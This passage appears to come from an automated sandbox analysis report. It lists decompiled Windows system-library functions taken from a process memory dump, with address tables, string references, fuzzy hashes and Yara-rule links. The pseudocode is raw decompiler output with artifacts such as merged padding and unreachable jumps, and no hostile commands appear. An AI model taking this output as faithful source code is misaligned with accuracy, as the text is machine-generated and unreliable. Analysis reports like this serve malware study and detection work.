				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E033AEEF0(0x3487b60);
					_t134 =  *0x3487b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3487b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3487b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E033A6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E033A76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E03438938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0339B150();
													}
													_t116 = E03436D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E033A75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3488638; // 0x0
																	_t122 = L033A38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E033A76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E033A76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L033CFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L033A70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E033CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E033CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E033CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E033CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E033CFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3487b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3487b84 = _t75;
						_t73 = E033AEB70(_t134, 0x3487b60);
						if( *0x3487b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E033AFF60( *0x3487b20);
							}
						}
						goto L5;
					}
				}
			}

0x033cfab0
0x033cfab2
0x033cfab3
0x033cfab4
0x033cfabc
0x033cfac0
0x033cfb14
0x033cfb17
0x033cfac2
0x033cfac8
0x033cfacd
0x033cfad3
0x033cfad3
0x033cfadd
0x033cfb18
0x033cfb1b
0x033cfb1d
0x033cfb1e
0x033cfb1f
0x033cfb20
0x033cfb21
0x033cfb22
0x033cfb23
0x033cfb24
0x033cfb25
0x033cfb26
0x033cfb27
0x033cfb28
0x033cfb29
0x033cfb2a
0x033cfb2b
0x033cfb2c
0x033cfb2d
0x033cfb2e
0x033cfb2f
0x033cfb3a
0x033cfb3b
0x033cfb3e
0x033cfb41
0x033cfb44
0x033cfb47
0x033cfb4a
0x033cfb4d
0x033cfb53
0x0340bdcb
0x0340bdcb
0x033cfb59
0x033cfb5b
0x033cfb5b
0x033cfb5e
0x0340bdd5
0x0340bdd8
0x00000000
0x0340bdda
0x00000000
0x0340bdda
0x033cfb64
0x033cfb64
0x033cfb64
0x033cfb67
0x033cfb6e
0x033cfb70
0x033cfb72
0x00000000
0x033cfb78
0x033cfb7a
0x033cfb7a
0x033cfb7d
0x033cfb80
0x0340bddf
0x0340bde1
0x00000000
0x0340bde3
0x00000000
0x0340bde3
0x033cfb86
0x033cfb86
0x033cfb86
0x033cfb8b
0x033cfb90
0x033cfb92
0x033cfb94
0x033cfb9a
0x033cfb9b
0x033cfba1
0x0340bde8
0x0340bdeb
0x0340bded
0x0340beb5
0x0340beb5
0x0340bebb
0x0340bebd
0x0340bec3
0x0340bed2
0x0340bedd
0x0340bedd
0x0340beed
0x00000000
0x0340bdf3
0x0340bdfe
0x0340be06
0x0340be0b
0x0340be0d
0x0340be0f
0x0340be14
0x0340be19
0x0340be20
0x0340be25
0x0340be27
0x0340be35
0x0340be39
0x0340be46
0x0340be4f
0x0340be54
0x0340be56
0x0340bef8
0x0340bef8
0x00000000
0x0340be5c
0x0340be5c
0x0340be60
0x00000000
0x0340be66
0x0340be66
0x0340be7f
0x0340be84
0x0340be87
0x0340be89
0x0340be8b
0x0340be99
0x0340be9d
0x0340bea0
0x0340beac
0x0340beaf
0x0340beb1
0x0340beb3
0x0340beb3
0x00000000
0x0340bea2
0x0340bea2
0x00000000
0x0340bea2
0x0340be8d
0x0340be8d
0x0340be92
0x00000000
0x0340be92
0x0340be8b
0x0340be60
0x0340be3b
0x0340be3b
0x0340be3e
0x00000000
0x0340be40
0x0340be40
0x0340be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0340be44
0x0340be3e
0x0340be29
0x0340be29
0x00000000
0x0340be29
0x0340be27
0x00000000
0x033cfba7
0x033cfba7
0x033cfbab
0x0340bf02
0x033cfbb1
0x033cfbb1
0x033cfbb8
0x033cfbbd
0x033cfbbd
0x033cfbbf
0x033cfbbf
0x033cfbc5
0x033cfbcb
0x033cfbf8
0x033cfbf8
0x033cfbfa
0x00000000
0x033cfc00
0x033cfc00
0x033cfc03
0x00000000
0x033cfc09
0x033cfc09
0x033cfc0f
0x033cfc15
0x033cfc23
0x033cfc23
0x033cfc25
0x033cfc27
0x033cfc75
0x033cfc7c
0x033cfc84
0x00000000
0x033cfc29
0x033cfc29
0x033cfc2d
0x033cfc30
0x0340bf0f
0x00000000
0x033cfc36
0x033cfc38
0x033cfc3b
0x033cfc41
0x0340bf17
0x0340bf19
0x0340bf48
0x0340bf4b
0x00000000
0x0340bf1b
0x0340bf22
0x0340bf24
0x0340bf26
0x00000000
0x0340bf2c
0x0340bf37
0x0340bf39
0x0340bf3b
0x00000000
0x0340bf41
0x0340bf41
0x0340bf41
0x0340bf41
0x0340bf45
0x00000000
0x0340bf45
0x0340bf3b
0x0340bf26
0x00000000
0x033cfc47
0x033cfc47
0x033cfc49
0x033cfcb2
0x033cfcb4
0x033cfcb6
0x033cfcdc
0x033cfcdc
0x00000000
0x033cfcb8
0x033cfcc3
0x033cfcc5
0x033cfcc7
0x00000000
0x033cfcc9
0x033cfcc9
0x033cfccd
0x00000000
0x033cfccd
0x033cfcc7
0x00000000
0x033cfc4b
0x033cfc4b
0x033cfc4e
0x033cfc4e
0x033cfc51
0x033cfc51
0x033cfc54
0x033cfc5a
0x033cfc5c
0x033cfc5f
0x033cfc61
0x033cfc63
0x033cfc65
0x033cfc67
0x033cfc6e
0x033cfc72
0x033cfc72
0x033cfc72
0x033cfc72
0x033cfc67
0x033cfc61
0x00000000
0x033cfc5a
0x033cfc49
0x033cfc41
0x033cfc30
0x033cfc27
0x033cfc03
0x033cfbcd
0x033cfbd3
0x033cfbd9
0x033cfbdc
0x033cfbde
0x033cfc99
0x033cfc9b
0x033cfc9d
0x033cfcd5
0x033cfcd5
0x033cfc89
0x033cfc89
0x00000000
0x033cfc9f
0x033cfc9f
0x033cfca3
0x00000000
0x033cfca3
0x00000000
0x033cfbe4
0x033cfbe4
0x033cfbe4
0x033cfbe4
0x033cfbe9
0x033cfbf2
0x00000000
0x033cfbf2
0x033cfbde
0x033cfbcb
0x033cfbab
0x033cfc8b
0x033cfc8b
0x033cfc8c
0x033cfb80
0x033cfb72
0x033cfb5e
0x033cfc8d
0x033cfc91
0x033cfadf
0x033cfadf
0x033cfae1
0x033cfae4
0x033cfae7
0x033cfaec
0x033cfaf8
0x033cfb00
0x033cfb07
0x033cfb0f
0x033cfb0f
0x033cfb07
0x00000000
0x033cfaf8
0x033cfadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0340BE0F

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: f817192527598ce8d7ec5b875d7644109319a04367575a8e5e9ecac8f3ebdb95
Instruction ID: 1974ffc0b32c0bf6b5b836b7cb984df4d5401225ed63d9f15c9090c18b978e7e
Opcode Fuzzy Hash: f817192527598ce8d7ec5b875d7644109319a04367575a8e5e9ecac8f3ebdb95
Instruction Fuzzy Hash: 77A1E375B107468BDB25DB68C890B7AB7AAEF44710F08857EE916DF790DB34DC018B84

Uniqueness

Uniqueness Score: -1.00%

Function 00352258, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,00000006,?,00352418), ref: 0035228B

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: DebuggerPresent
String ID:
API String ID: 1347740429-0
Opcode ID: 7f679871d1f567409ffbcd447aa834988c3ec89de73693f12b1d9938e2ba9c77
Instruction ID: 5610f0406db6283081654b427e5ef493a7c54d5456503aecd506e2842e6803cd
Opcode Fuzzy Hash: 7f679871d1f567409ffbcd447aa834988c3ec89de73693f12b1d9938e2ba9c77
Instruction Fuzzy Hash: 5CF0273061412CABCB629F75A906B7B37ECAB56702F020649EC0BC7561CA60AD4D5691

Uniqueness

Uniqueness Score: -1.00%

Function 033B746D, Relevance: 1.5, APIs: 1, Instructions: 31
nativeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E033B746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E033AEB70(__ecx, 0x34879a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							NtClose( *(__ecx + 4));
							L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x033b746d
0x033b746d
0x033b746d
0x033b7471
0x033b7488
0x033ff92d
0x033b748e
0x033b7491
0x033b7495
0x033ff93a
0x033ff94e
0x033ff953
0x033ff956
0x033ff956
0x033b7495
0x00000000
0x033b7488
0x033b7473
0x033b7478
0x033b747d
0x033b7481
0x00000000
0x033b7481
0x033b747d
0x033b747a
0x00000000

APIs

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,033B70EF,?,00000000,?), ref: 033FF93A

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001Close.0000001
String ID:
API String ID: 971714608-0
Opcode ID: 570c7834eb50ebc054f4b6ada0502928e4e9a3517e2e42ede4e3918809adab1b
Instruction ID: c3039838a2ccb6acc56cc17c46c812171284be8d959bc6fac2e9374d4779ee8d
Opcode Fuzzy Hash: 570c7834eb50ebc054f4b6ada0502928e4e9a3517e2e42ede4e3918809adab1b
Instruction Fuzzy Hash: 38F0B438A05244AACF01D768C8C0BFABBB9EF84211F580255DAE1AB950E76498418785

Uniqueness

Uniqueness Score: -1.00%

Function 00347310, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000172C0), ref: 00347315

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5693830820d76684a4a8fa10bfec298adb08a8b4fa4c486a5930135e972c9d29
Instruction ID: dd4b6e9e6b3347eae66e60c89313b728b64540164f4fa75ed9f7754d8a3be93b
Opcode Fuzzy Hash: 5693830820d76684a4a8fa10bfec298adb08a8b4fa4c486a5930135e972c9d29
Instruction Fuzzy Hash: 899002603656108A8B2227715C0994565E45A99702B414D91F005C9054DBA151486521

Uniqueness

Uniqueness Score: -1.00%

Function 033A1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E033A1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E033DBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E033DA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E033DA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L033B4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x033a1b8f
0x033a1b9a
0x033a1b9c
0x033a1b9e
0x033a1ba3
0x033f7010
0x033f7010
0x00000000
0x033a1ba9
0x033a1ba9
0x033a1bae
0x00000000
0x033a1bc5
0x033a1bca
0x033a1bcf
0x033a1bd0
0x033a1bd1
0x033a1bd2
0x033a1bd6
0x033a1bdc
0x033a1be0
0x033f6ffc
0x033f7000
0x00000000
0x033f7006
0x033f7009
0x033f7009
0x033a1be6
0x033a1bec
0x033a1c0b
0x033a1c0b
0x033a1c0c
0x033a1c11
0x033a1c12
0x033a1c15
0x033a1c1b
0x033a1c1f
0x033a1c31
0x033a1c33
0x033f7026
0x033f7026
0x033a1c21
0x033a1c24
0x033a1c24
0x033a1bee
0x033a1bee
0x033a1bf2
0x033a1c3a
0x033a1bf4
0x033a1bf4
0x033a1c05
0x033a1c05
0x033a1c09
0x033a1c3e
0x00000000
0x00000000
0x00000000
0x033a1c09
0x033a1bec
0x033a1be0
0x033a1bae
0x033a1c2e

Strings

WindowsExcludedProcs, xrefs: 033A1BC5

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 652aff131814e2fcf6916ed7543f1dc01909bd11b2fe8d57cb1f23a725e53a5d
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 9121C277D01A29AFCB22DA59CDC1FABF7ADEF81A50F0A4465FA049B610D634DD0097A0

Uniqueness

Uniqueness Score: -1.00%

Function 03448DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E03448DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x3470d50);
				E033ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E03425720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E033EDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E033EDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E033ED130(_t34, _t39, _t40);
			}

0x03448df1
0x03448df1
0x03448df1
0x03448df1
0x03448df1
0x03448df1
0x03448df3
0x03448df8
0x03448dfd
0x03448e00
0x03448e0e
0x03448e2a
0x03448e36
0x03448e38
0x03448e3c
0x03448e46
0x03448e46
0x03448e36
0x03448e50
0x03448e56
0x03448e59
0x03448e5c
0x03448e60
0x03448e67
0x03448e6d
0x03448e73
0x03448e74
0x03448eb1
0x03448ebd

Strings

Critical error detected %lx, xrefs: 03448E21

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: beeb0845ca22fe093d7f4220bbb823c35607e79c51590b8639cef6b781d52cb0
Instruction ID: 3f7f5b54d91585cf76731b2cddb91ef6de2e2404827412a3e84419a06d0b1df6
Opcode Fuzzy Hash: beeb0845ca22fe093d7f4220bbb823c35607e79c51590b8639cef6b781d52cb0
Instruction Fuzzy Hash: 91112379D55348EEEB24DFA889467ADBBB0AB04714F24426ED429AF292C2354602CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0342FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0342FF60

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 6f2594bbfa1310e3566474fe2c7b359ed34eea49d971ed837fc8e23392c4d03e
Instruction ID: 05803456eb12e9b1359348b308d2473e38feedc905c10256dae2d6281d5acfb4
Opcode Fuzzy Hash: 6f2594bbfa1310e3566474fe2c7b359ed34eea49d971ed837fc8e23392c4d03e
Instruction Fuzzy Hash: 84110075920654EFDB12EB50C988F9DBBB1FF08704F99808AE508AF2A1C7389944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 033C513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E033C513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x348d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
